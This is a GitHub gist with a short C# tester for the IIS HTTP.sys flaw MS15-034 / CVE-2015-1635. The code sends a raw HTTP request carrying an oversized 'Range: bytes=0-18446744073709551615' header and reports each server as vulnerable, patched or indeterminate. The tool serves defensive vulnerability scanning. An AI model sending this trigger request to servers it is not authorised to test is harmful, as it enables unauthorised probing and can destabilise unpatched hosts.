Last active
February 18, 2023 01:06
-
-
Save Zagrophyte/0fa7a8e2e507fac2b59d to your computer and use it in GitHub Desktop.
MS15-034 / CVE-2015-1635 Tester
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| void Main() | |
| { | |
| TestMS15_034("www.example.com"); // Replace with whatever server(s) you'd like to test. | |
| TestMS15_034("www2.example.com", 8080); | |
| } | |
| // Sends CVE-2015-1635 / MS15-034 Test Request and checks for vulnerability | |
| public void TestMS15_034(String host, int port = 80) | |
| { | |
| TcpClient tc = new TcpClient(); | |
| try | |
| { | |
| tc.Connect(host, port); | |
| using (NetworkStream ns = tc.GetStream()) | |
| { | |
| System.IO.StreamWriter sw = new System.IO.StreamWriter(ns); | |
| System.IO.StreamReader sr = new System.IO.StreamReader(ns); | |
| string req = ""; | |
| req += "GET / HTTP/1.0\r\n"; | |
| req += "Host: test\r\n"; | |
| req += "Range: bytes=0-18446744073709551615\r\n"; | |
| req += "\r\n"; | |
| sw.Write(req); | |
| sw.Flush(); | |
| var response = sr.ReadToEnd(); | |
| if (response.Contains("Requested Range Not Satisfiable")) | |
| { | |
| Console.WriteLine("{0}:{1} - VULNERABLE", host, port); | |
| } | |
| else if (response.Contains("The request has an invalid header name")) | |
| { | |
| Console.WriteLine("{0}:{1} - Patched", host, port); | |
| } | |
| else | |
| { | |
| Console.WriteLine("{0}:{1} - Indeterminate", host, port); | |
| } | |
| } | |
| } | |
| catch (Exception ex) | |
| { | |
| Console.WriteLine("{0}:{1} - Indeterminate: {2}", host, port, ex.Message); | |
| } | |
| finally | |
| { | |
| tc.Close(); | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment